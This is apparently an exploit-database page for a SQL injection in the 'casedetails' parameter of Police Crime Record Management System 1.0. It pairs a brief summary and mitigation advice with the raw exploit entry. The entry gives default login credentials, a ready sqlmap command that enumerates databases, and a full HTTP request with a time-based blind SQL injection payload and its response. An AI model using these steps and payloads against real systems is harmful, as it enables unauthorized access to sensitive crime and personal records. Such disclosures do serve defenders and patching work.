Police Crime Record Management System 1.0 - 'casedetails' SQL Injection

vendor:

Police Crime Record Management System

by:

Ömer Hasan Durmus

9.1

CVSS

CRITICAL

SQL Injection

CWE

Product Name: Police Crime Record Management System

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Linux, Windows

2021

Police Crime Record Management System 1.0 – ‘casedetails’ SQL Injection

The Police Crime Record Management System 1.0 is vulnerable to SQL injection in the 'casedetails' parameter. An attacker can exploit this vulnerability to manipulate the SQL query and potentially extract sensitive information from the database.

Mitigation:

To mitigate this vulnerability, the developer should use parameterized queries or prepared statements to sanitize user input and prevent SQL injection attacks. Additionally, input validation and output encoding should be implemented to further protect against injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: Police Crime Record Management System 1.0 - 'casedetails' SQL Injection
# Date: 12/08/2021
# Exploit Author: Ömer Hasan Durmuş
# Software Link: https://www.sourcecodester.com/php/14894/police-crime-record-management-system.html
# Version: v1.0
# Category: Webapps
# Tested on: Linux/Windows

Step 1 : Login CID account in http://TARGET/ghpolice/login.php default credentials. (005:12345)
STEP 2 : Send the following request
or
Use sqlmap : python sqlmap.py -u "
http://TARGET/ghpolice/cid/casedetails.php?id=210728101"
--cookie="PHPSESSID=ev8vn1d1de5hjrv9273dunao8j" --dbs -vv

# Request

GET
/ghpolice/cid/casedetails.php?id=210728101'+AND+(SELECT+2115+FROM+(SELECT(SLEEP(5)))GQtj)+AND'gKJE'='gKJE
HTTP/1.1
Host: target.com
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://target.com/ghpolice/cid/
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=ev8vn1d1de5hjrv9273dunao8j
Connection: close

# Response after 5 seconds

HTTP/1.1 200 OK
Date: Thu, 12 Aug 2021 21:32:47 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.4.14
X-Powered-By: PHP/7.4.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 6913
Connection: close
Content-Type: text/html; charset=UTF-8
...
...
...